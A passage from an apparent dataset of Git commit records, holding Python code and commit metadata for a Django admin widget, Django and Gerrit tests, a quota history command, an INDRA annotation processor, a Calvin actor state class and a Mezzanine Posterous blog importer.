obj = self.rel.to._default_manager.get(**{key: value})
return ' <strong>%s</strong> %s' % (truncate_words(obj, 14), obj.thumb())
|
<commit_before><commit_msg>Add a rawIdImageWidget that can easily be used in admin. This widget will display a thumbnail of the selected image.<commit_after>from django.utils.text import truncate_words
from django.contrib.admin.widgets import ForeignKeyRawIdWidget
class ForeignKeyRawIdImageWidget(ForeignKeyRawIdWidget):
"""
A Widget for displaying ForeignKeys in the "raw_id" interface and a thumbnail
rather than in a <select> box.
"""
def label_for_value(self, value):
key = self.rel.get_related_field().name
obj = self.rel.to._default_manager.get(**{key: value})
return ' <strong>%s</strong> %s' % (truncate_words(obj, 14), obj.thumb())
|
|
58712fe5669704b10927a6e9dc3ed560aed0b260
|
candidates/tests/test_get_data_for_popit.py
|
candidates/tests/test_get_data_for_popit.py
|
from django.test import TestCase
from candidates.models import get_person_data_from_dict
# All these are essentially tests for get_person_data_from_dict
class TestGetDataForPopIt(TestCase):
def test_get_person_data_from_dict(self):
form_data = {
'name': 'John Doe',
'email': 'john@example.org',
'birth_date': '',
'wikipedia_url': 'http://en.wikipedia.org/wiki/John_Doe',
'homepage_url': '',
'twitter_username': 'foobar',
'facebook_personal_url': '',
'facebook_page_url': '',
'party_ppc_page_url': '',
}
expected_result = {
'birth_date': None,
'contact_details': [
{
'type': 'twitter',
'value': 'foobar'
}
],
'email': u'john@example.org',
'links': [
{
'note': 'wikipedia', 'url': 'http://en.wikipedia.org/wiki/John_Doe'
}
],
'name': u'John Doe',
}
self.assertEqual(
get_person_data_from_dict(form_data),
expected_result
)
def test_get_person_data_from_dict_clear_email(self):
form_data = {
'name': 'John Doe',
'email': '',
'birth_date': '',
'wikipedia_url': 'http://en.wikipedia.org/wiki/John_Doe',
'homepage_url': '',
'twitter_username': 'foobar',
'facebook_personal_url': '',
'facebook_page_url': '',
'party_ppc_page_url': '',
}
expected_result = {
'birth_date': None,
'contact_details': [
{
'type': 'twitter',
'value': 'foobar'
}
],
'links': [
{
'note': 'wikipedia', 'url': 'http://en.wikipedia.org/wiki/John_Doe'
}
],
'name': u'John Doe',
}
self.assertEqual(
get_person_data_from_dict(form_data),
expected_result
)
|
Add tests for the current behaviour of get_person_data_from_dict
|
Add tests for the current behaviour of get_person_data_from_dict
|
Python
|
agpl-3.0
|
datamade/yournextmp-popit,mysociety/yournextmp-popit,datamade/yournextmp-popit,mysociety/yournextmp-popit,YoQuieroSaber/yournextrepresentative,YoQuieroSaber/yournextrepresentative,DemocracyClub/yournextrepresentative,datamade/yournextmp-popit,openstate/yournextrepresentative,openstate/yournextrepresentative,DemocracyClub/yournextrepresentative,mysociety/yournextmp-popit,neavouli/yournextrepresentative,mysociety/yournextrepresentative,openstate/yournextrepresentative,mhl/yournextmp-popit,mysociety/yournextmp-popit,mysociety/yournextrepresentative,openstate/yournextrepresentative,datamade/yournextmp-popit,mysociety/yournextrepresentative,mhl/yournextmp-popit,YoQuieroSaber/yournextrepresentative,mysociety/yournextrepresentative,neavouli/yournextrepresentative,mysociety/yournextmp-popit,datamade/yournextmp-popit,neavouli/yournextrepresentative,mysociety/yournextrepresentative,neavouli/yournextrepresentative,DemocracyClub/yournextrepresentative,YoQuieroSaber/yournextrepresentative,mhl/yournextmp-popit,neavouli/yournextrepresentative,YoQuieroSaber/yournextrepresentative,openstate/yournextrepresentative
|
Add tests for the current behaviour of get_person_data_from_dict
|
from django.test import TestCase
from candidates.models import get_person_data_from_dict
# All these are essentially tests for get_person_data_from_dict
class TestGetDataForPopIt(TestCase):
def test_get_person_data_from_dict(self):
form_data = {
'name': 'John Doe',
'email': 'john@example.org',
'birth_date': '',
'wikipedia_url': 'http://en.wikipedia.org/wiki/John_Doe',
'homepage_url': '',
'twitter_username': 'foobar',
'facebook_personal_url': '',
'facebook_page_url': '',
'party_ppc_page_url': '',
}
expected_result = {
'birth_date': None,
'contact_details': [
{
'type': 'twitter',
'value': 'foobar'
}
],
'email': u'john@example.org',
'links': [
{
'note': 'wikipedia', 'url': 'http://en.wikipedia.org/wiki/John_Doe'
}
],
'name': u'John Doe',
}
self.assertEqual(
get_person_data_from_dict(form_data),
expected_result
)
def test_get_person_data_from_dict_clear_email(self):
form_data = {
'name': 'John Doe',
'email': '',
'birth_date': '',
'wikipedia_url': 'http://en.wikipedia.org/wiki/John_Doe',
'homepage_url': '',
'twitter_username': 'foobar',
'facebook_personal_url': '',
'facebook_page_url': '',
'party_ppc_page_url': '',
}
expected_result = {
'birth_date': None,
'contact_details': [
{
'type': 'twitter',
'value': 'foobar'
}
],
'links': [
{
'note': 'wikipedia', 'url': 'http://en.wikipedia.org/wiki/John_Doe'
}
],
'name': u'John Doe',
}
self.assertEqual(
get_person_data_from_dict(form_data),
expected_result
)
|
<commit_before><commit_msg>Add tests for the current behaviour of get_person_data_from_dict<commit_after>
|
from django.test import TestCase
from candidates.models import get_person_data_from_dict
# All these are essentially tests for get_person_data_from_dict
class TestGetDataForPopIt(TestCase):
def test_get_person_data_from_dict(self):
form_data = {
'name': 'John Doe',
'email': 'john@example.org',
'birth_date': '',
'wikipedia_url': 'http://en.wikipedia.org/wiki/John_Doe',
'homepage_url': '',
'twitter_username': 'foobar',
'facebook_personal_url': '',
'facebook_page_url': '',
'party_ppc_page_url': '',
}
expected_result = {
'birth_date': None,
'contact_details': [
{
'type': 'twitter',
'value': 'foobar'
}
],
'email': u'john@example.org',
'links': [
{
'note': 'wikipedia', 'url': 'http://en.wikipedia.org/wiki/John_Doe'
}
],
'name': u'John Doe',
}
self.assertEqual(
get_person_data_from_dict(form_data),
expected_result
)
def test_get_person_data_from_dict_clear_email(self):
form_data = {
'name': 'John Doe',
'email': '',
'birth_date': '',
'wikipedia_url': 'http://en.wikipedia.org/wiki/John_Doe',
'homepage_url': '',
'twitter_username': 'foobar',
'facebook_personal_url': '',
'facebook_page_url': '',
'party_ppc_page_url': '',
}
expected_result = {
'birth_date': None,
'contact_details': [
{
'type': 'twitter',
'value': 'foobar'
}
],
'links': [
{
'note': 'wikipedia', 'url': 'http://en.wikipedia.org/wiki/John_Doe'
}
],
'name': u'John Doe',
}
self.assertEqual(
get_person_data_from_dict(form_data),
expected_result
)
|
Add tests for the current behaviour of get_person_data_from_dictfrom django.test import TestCase
from candidates.models import get_person_data_from_dict
# All these are essentially tests for get_person_data_from_dict
class TestGetDataForPopIt(TestCase):
def test_get_person_data_from_dict(self):
form_data = {
'name': 'John Doe',
'email': 'john@example.org',
'birth_date': '',
'wikipedia_url': 'http://en.wikipedia.org/wiki/John_Doe',
'homepage_url': '',
'twitter_username': 'foobar',
'facebook_personal_url': '',
'facebook_page_url': '',
'party_ppc_page_url': '',
}
expected_result = {
'birth_date': None,
'contact_details': [
{
'type': 'twitter',
'value': 'foobar'
}
],
'email': u'john@example.org',
'links': [
{
'note': 'wikipedia', 'url': 'http://en.wikipedia.org/wiki/John_Doe'
}
],
'name': u'John Doe',
}
self.assertEqual(
get_person_data_from_dict(form_data),
expected_result
)
def test_get_person_data_from_dict_clear_email(self):
form_data = {
'name': 'John Doe',
'email': '',
'birth_date': '',
'wikipedia_url': 'http://en.wikipedia.org/wiki/John_Doe',
'homepage_url': '',
'twitter_username': 'foobar',
'facebook_personal_url': '',
'facebook_page_url': '',
'party_ppc_page_url': '',
}
expected_result = {
'birth_date': None,
'contact_details': [
{
'type': 'twitter',
'value': 'foobar'
}
],
'links': [
{
'note': 'wikipedia', 'url': 'http://en.wikipedia.org/wiki/John_Doe'
}
],
'name': u'John Doe',
}
self.assertEqual(
get_person_data_from_dict(form_data),
expected_result
)
|
<commit_before><commit_msg>Add tests for the current behaviour of get_person_data_from_dict<commit_after>from django.test import TestCase
from candidates.models import get_person_data_from_dict
# All these are essentially tests for get_person_data_from_dict
class TestGetDataForPopIt(TestCase):
def test_get_person_data_from_dict(self):
form_data = {
'name': 'John Doe',
'email': 'john@example.org',
'birth_date': '',
'wikipedia_url': 'http://en.wikipedia.org/wiki/John_Doe',
'homepage_url': '',
'twitter_username': 'foobar',
'facebook_personal_url': '',
'facebook_page_url': '',
'party_ppc_page_url': '',
}
expected_result = {
'birth_date': None,
'contact_details': [
{
'type': 'twitter',
'value': 'foobar'
}
],
'email': u'john@example.org',
'links': [
{
'note': 'wikipedia', 'url': 'http://en.wikipedia.org/wiki/John_Doe'
}
],
'name': u'John Doe',
}
self.assertEqual(
get_person_data_from_dict(form_data),
expected_result
)
def test_get_person_data_from_dict_clear_email(self):
form_data = {
'name': 'John Doe',
'email': '',
'birth_date': '',
'wikipedia_url': 'http://en.wikipedia.org/wiki/John_Doe',
'homepage_url': '',
'twitter_username': 'foobar',
'facebook_personal_url': '',
'facebook_page_url': '',
'party_ppc_page_url': '',
}
expected_result = {
'birth_date': None,
'contact_details': [
{
'type': 'twitter',
'value': 'foobar'
}
],
'links': [
{
'note': 'wikipedia', 'url': 'http://en.wikipedia.org/wiki/John_Doe'
}
],
'name': u'John Doe',
}
self.assertEqual(
get_person_data_from_dict(form_data),
expected_result
)
|
|
1d02a8526abf8dfd9f76bbec7fac26a58ff0b25b
|
nodeconductor/quotas/management/commands/initglobalquotashistory.py
|
nodeconductor/quotas/management/commands/initglobalquotashistory.py
|
from __future__ import unicode_literals
from django.contrib.contenttypes.models import ContentType
from django.core import serializers as django_serializers
from django.core.management.base import BaseCommand
from reversion.models import Version, Revision
from nodeconductor.quotas import models
from nodeconductor.quotas.utils import get_models_with_quotas
class Command(BaseCommand):
""" Recalculate all quotas """
def handle(self, *args, **options):
for model in get_models_with_quotas():
if hasattr(model, 'GLOBAL_COUNT_QUOTA_NAME'):
quota, _ = models.Quota.objects.get_or_create(name=model.GLOBAL_COUNT_QUOTA_NAME)
for index, instance in enumerate(model.objects.all().order_by('created')):
revision = Revision.objects.create()
revision.date_created = instance.created
revision.save()
quota.usage = index + 1
serializer = django_serializers.get_serializer('json')()
serialized_data = serializer.serialize([quota])
Version.objects.create(
revision=revision,
object_id=quota.id,
object_id_int=quota.id,
content_type=ContentType.objects.get_for_model(quota),
format='json',
serialized_data=serialized_data,
object_repr=str(quota),
)
|
Implement command for quotas history population
|
Implement command for quotas history population
- itacloud-5296
|
Python
|
mit
|
opennode/nodeconductor,opennode/nodeconductor,opennode/nodeconductor
|
Implement command for quotas history population
- itacloud-5296
|
from __future__ import unicode_literals
from django.contrib.contenttypes.models import ContentType
from django.core import serializers as django_serializers
from django.core.management.base import BaseCommand
from reversion.models import Version, Revision
from nodeconductor.quotas import models
from nodeconductor.quotas.utils import get_models_with_quotas
class Command(BaseCommand):
""" Recalculate all quotas """
def handle(self, *args, **options):
for model in get_models_with_quotas():
if hasattr(model, 'GLOBAL_COUNT_QUOTA_NAME'):
quota, _ = models.Quota.objects.get_or_create(name=model.GLOBAL_COUNT_QUOTA_NAME)
for index, instance in enumerate(model.objects.all().order_by('created')):
revision = Revision.objects.create()
revision.date_created = instance.created
revision.save()
quota.usage = index + 1
serializer = django_serializers.get_serializer('json')()
serialized_data = serializer.serialize([quota])
Version.objects.create(
revision=revision,
object_id=quota.id,
object_id_int=quota.id,
content_type=ContentType.objects.get_for_model(quota),
format='json',
serialized_data=serialized_data,
object_repr=str(quota),
)
|
<commit_before><commit_msg>Implement command for quotas history population
- itacloud-5296<commit_after>
|
from __future__ import unicode_literals
from django.contrib.contenttypes.models import ContentType
from django.core import serializers as django_serializers
from django.core.management.base import BaseCommand
from reversion.models import Version, Revision
from nodeconductor.quotas import models
from nodeconductor.quotas.utils import get_models_with_quotas
class Command(BaseCommand):
""" Recalculate all quotas """
def handle(self, *args, **options):
for model in get_models_with_quotas():
if hasattr(model, 'GLOBAL_COUNT_QUOTA_NAME'):
quota, _ = models.Quota.objects.get_or_create(name=model.GLOBAL_COUNT_QUOTA_NAME)
for index, instance in enumerate(model.objects.all().order_by('created')):
revision = Revision.objects.create()
revision.date_created = instance.created
revision.save()
quota.usage = index + 1
serializer = django_serializers.get_serializer('json')()
serialized_data = serializer.serialize([quota])
Version.objects.create(
revision=revision,
object_id=quota.id,
object_id_int=quota.id,
content_type=ContentType.objects.get_for_model(quota),
format='json',
serialized_data=serialized_data,
object_repr=str(quota),
)
|
Implement command for quotas history population
- itacloud-5296from __future__ import unicode_literals
from django.contrib.contenttypes.models import ContentType
from django.core import serializers as django_serializers
from django.core.management.base import BaseCommand
from reversion.models import Version, Revision
from nodeconductor.quotas import models
from nodeconductor.quotas.utils import get_models_with_quotas
class Command(BaseCommand):
""" Recalculate all quotas """
def handle(self, *args, **options):
for model in get_models_with_quotas():
if hasattr(model, 'GLOBAL_COUNT_QUOTA_NAME'):
quota, _ = models.Quota.objects.get_or_create(name=model.GLOBAL_COUNT_QUOTA_NAME)
for index, instance in enumerate(model.objects.all().order_by('created')):
revision = Revision.objects.create()
revision.date_created = instance.created
revision.save()
quota.usage = index + 1
serializer = django_serializers.get_serializer('json')()
serialized_data = serializer.serialize([quota])
Version.objects.create(
revision=revision,
object_id=quota.id,
object_id_int=quota.id,
content_type=ContentType.objects.get_for_model(quota),
format='json',
serialized_data=serialized_data,
object_repr=str(quota),
)
|
<commit_before><commit_msg>Implement command for quotas history population
- itacloud-5296<commit_after>from __future__ import unicode_literals
from django.contrib.contenttypes.models import ContentType
from django.core import serializers as django_serializers
from django.core.management.base import BaseCommand
from reversion.models import Version, Revision
from nodeconductor.quotas import models
from nodeconductor.quotas.utils import get_models_with_quotas
class Command(BaseCommand):
""" Recalculate all quotas """
def handle(self, *args, **options):
for model in get_models_with_quotas():
if hasattr(model, 'GLOBAL_COUNT_QUOTA_NAME'):
quota, _ = models.Quota.objects.get_or_create(name=model.GLOBAL_COUNT_QUOTA_NAME)
for index, instance in enumerate(model.objects.all().order_by('created')):
revision = Revision.objects.create()
revision.date_created = instance.created
revision.save()
quota.usage = index + 1
serializer = django_serializers.get_serializer('json')()
serialized_data = serializer.serialize([quota])
Version.objects.create(
revision=revision,
object_id=quota.id,
object_id_int=quota.id,
content_type=ContentType.objects.get_for_model(quota),
format='json',
serialized_data=serialized_data,
object_repr=str(quota),
)
|
|
44f0ea9879ec05c7dca7f345d17ade07593f706b
|
tests/test_gerrit.py
|
tests/test_gerrit.py
|
import unittest
from pprint import pprint
from openstack_gerrit.collector import main
class GerritIntegrationTestCase(unittest.TestCase):
def test_query_change(self):
gs = main.GerritSession()
change = gs.query_change('423782')
# check if we have some expected keys
self.assertIn('project', change)
self.assertIn('status', change)
self.assertIn('subject', change)
|
Add quick tests for GerritSession
|
Add quick tests for GerritSession
|
Python
|
apache-2.0
|
marshallford/ndsu-ibm-capstone,marshallford/ndsu-ibm-capstone
|
Add quick tests for GerritSession
|
import unittest
from pprint import pprint
from openstack_gerrit.collector import main
class GerritIntegrationTestCase(unittest.TestCase):
def test_query_change(self):
gs = main.GerritSession()
change = gs.query_change('423782')
# check if we have some expected keys
self.assertIn('project', change)
self.assertIn('status', change)
self.assertIn('subject', change)
|
<commit_before><commit_msg>Add quick tests for GerritSession<commit_after>
|
import unittest
from pprint import pprint
from openstack_gerrit.collector import main
class GerritIntegrationTestCase(unittest.TestCase):
def test_query_change(self):
gs = main.GerritSession()
change = gs.query_change('423782')
# check if we have some expected keys
self.assertIn('project', change)
self.assertIn('status', change)
self.assertIn('subject', change)
|
Add quick tests for GerritSessionimport unittest
from pprint import pprint
from openstack_gerrit.collector import main
class GerritIntegrationTestCase(unittest.TestCase):
def test_query_change(self):
gs = main.GerritSession()
change = gs.query_change('423782')
# check if we have some expected keys
self.assertIn('project', change)
self.assertIn('status', change)
self.assertIn('subject', change)
|
<commit_before><commit_msg>Add quick tests for GerritSession<commit_after>import unittest
from pprint import pprint
from openstack_gerrit.collector import main
class GerritIntegrationTestCase(unittest.TestCase):
def test_query_change(self):
gs = main.GerritSession()
change = gs.query_change('423782')
# check if we have some expected keys
self.assertIn('project', change)
self.assertIn('status', change)
self.assertIn('subject', change)
|
|
8d906e55da3f87206b3ba6b2cea4cc1cf97a7321
|
indra/sources/hypothesis/processor.py
|
indra/sources/hypothesis/processor.py
|
import re
from indra.statements import BioContext, RefContext
from indra.preassembler.grounding_mapper.standardize import \
standardize_db_refs, name_from_grounding
class HypothesisProcessor:
def __init__(self, annotations, reader=None, grounder=None):
self.annotations = annotations
self.statements = []
if reader is None:
from indra.sources import reach
self.reader = reach.process_text
if grounder is None:
from gilda import ground
self.grounder = ground
def extract_statements(self):
for annotation in self.annotations:
stmts = self.stmts_from_annotation(annotation)
if stmts:
self.statements.extend(stmts)
def stmts_from_annotation(self, annotation):
text = annotation.get('text')
if not text:
return []
parts = [t for t in text.split('\n') if t]
rp = self.reader(parts[0])
for part in parts[1:]:
match = re.match(r'Context: (.*)', part)
if not match:
continue
context_txt = match.groups()[0]
terms = self.grounder(context_txt)
db_refs = standardize_db_refs({terms[0].db: terms[0].id}) \
if terms else {}
db_refs['TEXT'] = context_txt
standard_name = name_from_grounding(terms[0].db, terms[0].id)
name = standard_name if standard_name else context_txt
# TODO: how can we tell what kind of BioContext this is exactly?
# Disease, organ, cell type, etc?
context = RefContext(name=name, db_refs=db_refs)
for stmt in rp.statements:
stmt.evidence[0].annotations.update(annotation)
|
Add initial Statement and context extraction
|
Add initial Statement and context extraction
|
Python
|
bsd-2-clause
|
johnbachman/indra,johnbachman/belpy,bgyori/indra,johnbachman/indra,sorgerlab/belpy,sorgerlab/indra,johnbachman/belpy,bgyori/indra,sorgerlab/indra,johnbachman/belpy,sorgerlab/belpy,sorgerlab/indra,johnbachman/indra,sorgerlab/belpy,bgyori/indra
|
Add initial Statement and context extraction
|
import re
from indra.statements import BioContext, RefContext
from indra.preassembler.grounding_mapper.standardize import \
standardize_db_refs, name_from_grounding
class HypothesisProcessor:
def __init__(self, annotations, reader=None, grounder=None):
self.annotations = annotations
self.statements = []
if reader is None:
from indra.sources import reach
self.reader = reach.process_text
if grounder is None:
from gilda import ground
self.grounder = ground
def extract_statements(self):
for annotation in self.annotations:
stmts = self.stmts_from_annotation(annotation)
if stmts:
self.statements.extend(stmts)
def stmts_from_annotation(self, annotation):
text = annotation.get('text')
if not text:
return []
parts = [t for t in text.split('\n') if t]
rp = self.reader(parts[0])
for part in parts[1:]:
match = re.match(r'Context: (.*)', part)
if not match:
continue
context_txt = match.groups()[0]
terms = self.grounder(context_txt)
db_refs = standardize_db_refs({terms[0].db: terms[0].id}) \
if terms else {}
db_refs['TEXT'] = context_txt
standard_name = name_from_grounding(terms[0].db, terms[0].id)
name = standard_name if standard_name else context_txt
# TODO: how can we tell what kind of BioContext this is exactly?
# Disease, organ, cell type, etc?
context = RefContext(name=name, db_refs=db_refs)
for stmt in rp.statements:
stmt.evidence[0].annotations.update(annotation)
|
<commit_before><commit_msg>Add initial Statement and context extraction<commit_after>
|
import re
from indra.statements import BioContext, RefContext
from indra.preassembler.grounding_mapper.standardize import \
standardize_db_refs, name_from_grounding
class HypothesisProcessor:
def __init__(self, annotations, reader=None, grounder=None):
self.annotations = annotations
self.statements = []
if reader is None:
from indra.sources import reach
self.reader = reach.process_text
if grounder is None:
from gilda import ground
self.grounder = ground
def extract_statements(self):
for annotation in self.annotations:
stmts = self.stmts_from_annotation(annotation)
if stmts:
self.statements.extend(stmts)
def stmts_from_annotation(self, annotation):
text = annotation.get('text')
if not text:
return []
parts = [t for t in text.split('\n') if t]
rp = self.reader(parts[0])
for part in parts[1:]:
match = re.match(r'Context: (.*)', part)
if not match:
continue
context_txt = match.groups()[0]
terms = self.grounder(context_txt)
db_refs = standardize_db_refs({terms[0].db: terms[0].id}) \
if terms else {}
db_refs['TEXT'] = context_txt
standard_name = name_from_grounding(terms[0].db, terms[0].id)
name = standard_name if standard_name else context_txt
# TODO: how can we tell what kind of BioContext this is exactly?
# Disease, organ, cell type, etc?
context = RefContext(name=name, db_refs=db_refs)
for stmt in rp.statements:
stmt.evidence[0].annotations.update(annotation)
|
Add initial Statement and context extractionimport re
from indra.statements import BioContext, RefContext
from indra.preassembler.grounding_mapper.standardize import \
standardize_db_refs, name_from_grounding
class HypothesisProcessor:
def __init__(self, annotations, reader=None, grounder=None):
self.annotations = annotations
self.statements = []
if reader is None:
from indra.sources import reach
self.reader = reach.process_text
if grounder is None:
from gilda import ground
self.grounder = ground
def extract_statements(self):
for annotation in self.annotations:
stmts = self.stmts_from_annotation(annotation)
if stmts:
self.statements.extend(stmts)
def stmts_from_annotation(self, annotation):
text = annotation.get('text')
if not text:
return []
parts = [t for t in text.split('\n') if t]
rp = self.reader(parts[0])
for part in parts[1:]:
match = re.match(r'Context: (.*)', part)
if not match:
continue
context_txt = match.groups()[0]
terms = self.grounder(context_txt)
db_refs = standardize_db_refs({terms[0].db: terms[0].id}) \
if terms else {}
db_refs['TEXT'] = context_txt
standard_name = name_from_grounding(terms[0].db, terms[0].id)
name = standard_name if standard_name else context_txt
# TODO: how can we tell what kind of BioContext this is exactly?
# Disease, organ, cell type, etc?
context = RefContext(name=name, db_refs=db_refs)
for stmt in rp.statements:
stmt.evidence[0].annotations.update(annotation)
|
<commit_before><commit_msg>Add initial Statement and context extraction<commit_after>import re
from indra.statements import BioContext, RefContext
from indra.preassembler.grounding_mapper.standardize import \
standardize_db_refs, name_from_grounding
class HypothesisProcessor:
def __init__(self, annotations, reader=None, grounder=None):
self.annotations = annotations
self.statements = []
if reader is None:
from indra.sources import reach
self.reader = reach.process_text
if grounder is None:
from gilda import ground
self.grounder = ground
def extract_statements(self):
for annotation in self.annotations:
stmts = self.stmts_from_annotation(annotation)
if stmts:
self.statements.extend(stmts)
def stmts_from_annotation(self, annotation):
text = annotation.get('text')
if not text:
return []
parts = [t for t in text.split('\n') if t]
rp = self.reader(parts[0])
for part in parts[1:]:
match = re.match(r'Context: (.*)', part)
if not match:
continue
context_txt = match.groups()[0]
terms = self.grounder(context_txt)
db_refs = standardize_db_refs({terms[0].db: terms[0].id}) \
if terms else {}
db_refs['TEXT'] = context_txt
standard_name = name_from_grounding(terms[0].db, terms[0].id)
name = standard_name if standard_name else context_txt
# TODO: how can we tell what kind of BioContext this is exactly?
# Disease, organ, cell type, etc?
context = RefContext(name=name, db_refs=db_refs)
for stmt in rp.statements:
stmt.evidence[0].annotations.update(annotation)
|
|
b073e1294837b9776ea25d46c908b148ab404f21
|
calvin/actor/actorstate.py
|
calvin/actor/actorstate.py
|
# -*- coding: utf-8 -*-
# Copyright (c) 2016 Ericsson AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class ActorState(object):
"""
Class to let actors manipulate actor state variables before
a replication. Exposes managed attributes and 'replication_count'
as attributes of the object.
"""
def __init__(self, state, replication_data):
super(ActorState, self).__init__()
self.state = state
self.replication_data = replication_data
def __getattr__(self, name):
if name[0] != "_" and name in self.state['_managed']:
return self.state[name]
elif name == "replication_count":
return self.replication_data.counter
else:
raise AttributeError("ActorState does not have access to %s" % name)
def __setattr__(self, name, value):
if name == "state" or name == "replication_data":
self.__dict__[name] = value
elif name[0] != "_" and name in self.state['_managed']:
self.state[name] = value
else:
self.__dict__[name] = value
|
Add missed file for actor state manipulation during replication.
|
Add missed file for actor state manipulation during replication.
|
Python
|
apache-2.0
|
EricssonResearch/calvin-base,EricssonResearch/calvin-base,EricssonResearch/calvin-base,EricssonResearch/calvin-base
|
Add missed file for actor state manipulation during replication.
|
# -*- coding: utf-8 -*-
# Copyright (c) 2016 Ericsson AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class ActorState(object):
"""
Class to let actors manipulate actor state variables before
a replication. Exposes managed attributes and 'replication_count'
as attributes of the object.
"""
def __init__(self, state, replication_data):
super(ActorState, self).__init__()
self.state = state
self.replication_data = replication_data
def __getattr__(self, name):
if name[0] != "_" and name in self.state['_managed']:
return self.state[name]
elif name == "replication_count":
return self.replication_data.counter
else:
raise AttributeError("ActorState does not have access to %s" % name)
def __setattr__(self, name, value):
if name == "state" or name == "replication_data":
self.__dict__[name] = value
elif name[0] != "_" and name in self.state['_managed']:
self.state[name] = value
else:
self.__dict__[name] = value
|
<commit_before><commit_msg>Add missed file for actor state manipulation during replication.<commit_after>
|
# -*- coding: utf-8 -*-
# Copyright (c) 2016 Ericsson AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class ActorState(object):
"""
Class to let actors manipulate actor state variables before
a replication. Exposes managed attributes and 'replication_count'
as attributes of the object.
"""
def __init__(self, state, replication_data):
super(ActorState, self).__init__()
self.state = state
self.replication_data = replication_data
def __getattr__(self, name):
if name[0] != "_" and name in self.state['_managed']:
return self.state[name]
elif name == "replication_count":
return self.replication_data.counter
else:
raise AttributeError("ActorState does not have access to %s" % name)
def __setattr__(self, name, value):
if name == "state" or name == "replication_data":
self.__dict__[name] = value
elif name[0] != "_" and name in self.state['_managed']:
self.state[name] = value
else:
self.__dict__[name] = value
|
Add missed file for actor state manipulation during replication.
# -*- coding: utf-8 -*-
# Copyright (c) 2016 Ericsson AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class ActorState(object):
"""
Class to let actors manipulate actor state variables before
a replication. Exposes managed attributes and 'replication_count'
as attributes of the object.
"""
def __init__(self, state, replication_data):
super(ActorState, self).__init__()
self.state = state
self.replication_data = replication_data
def __getattr__(self, name):
if name[0] != "_" and name in self.state['_managed']:
return self.state[name]
elif name == "replication_count":
return self.replication_data.counter
else:
raise AttributeError("ActorState does not have access to %s" % name)
def __setattr__(self, name, value):
if name == "state" or name == "replication_data":
self.__dict__[name] = value
elif name[0] != "_" and name in self.state['_managed']:
self.state[name] = value
else:
self.__dict__[name] = value
|
<commit_before><commit_msg>Add missed file for actor state manipulation during replication.<commit_after>
# -*- coding: utf-8 -*-
# Copyright (c) 2016 Ericsson AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class ActorState(object):
"""
Class to let actors manipulate actor state variables before
a replication. Exposes managed attributes and 'replication_count'
as attributes of the object.
"""
def __init__(self, state, replication_data):
super(ActorState, self).__init__()
self.state = state
self.replication_data = replication_data
def __getattr__(self, name):
if name[0] != "_" and name in self.state['_managed']:
return self.state[name]
elif name == "replication_count":
return self.replication_data.counter
else:
raise AttributeError("ActorState does not have access to %s" % name)
def __setattr__(self, name, value):
if name == "state" or name == "replication_data":
self.__dict__[name] = value
elif name[0] != "_" and name in self.state['_managed']:
self.state[name] = value
else:
self.__dict__[name] = value
|
|
56d9482598d14b243f7e8d1cf0e167969e8fac4e
|
mezzanine/blog/management/commands/import_posterous.py
|
mezzanine/blog/management/commands/import_posterous.py
|
from mezzanine.blog.management.base import BaseImporterCommand
from optparse import make_option
from urllib import urlopen, urlencode
import requests
import json
import time
from datetime import datetime
import sys
# import requests_cache
# requests_cache.configure('demo_cache')
class PosterousImportException(Exception):
pass
class Command(BaseImporterCommand):
"""
Import Tumblr blog posts into the blog app.
"""
option_list = BaseImporterCommand.option_list + (
make_option("-a", "--api-token", dest="api_token",
help="Posterous API Key"),
make_option("-u", "--username", dest="username",
help="Posterous Username"),
make_option("-p", "--password", dest="password",
help="Posterous Password"),
make_option("-d", "--hostname", dest="hostname",
help="Posterous Blog Hostname")
)
help = "Import Posterous blog posts into the blog app."
def request(self, path, data=None):
my_config = {'verbose': sys.stderr}
data = data or {}
params = {
'api_token': self.api_token
}
params.update(data)
url = "http://posterous.com/api/2/%s" % path
r = requests.get(url, data=params, auth=(self.username, self.password), config=my_config)
if r.text.startswith("403"):
raise PosterousImportException(r.text)
try:
response = json.loads(r.text)
return response
except:
raise PosterousImportException(r.text)
def handle_import(self, options):
self.api_token = options.get("api_token")
self.username = options.get("username")
self.password = options.get("password")
hostname = options.get("hostname")
sites = self.request('sites')
for site in sites:
if site['full_hostname'] == hostname:
time.sleep(2)
break
path = 'sites/%s/posts' % site['id']
page = 1
while True:
posts = self.request(path, data={'page': page})
print len(posts)
if not posts:
break
for post in posts:
# import pprint
# print pprint.pprint(post)
content = post['body_full']
title = post['title']
old_url = post['full_url']
tags = [t['name'] for t in post['tags']]
pub_date = datetime.strptime(post['display_date'][:-6], "%Y/%m/%d %H:%M:%S")
self.add_post(
title=title,
content=content,
pub_date=pub_date,
tags=tags,
old_url=old_url
)
page += 1
time.sleep(2)
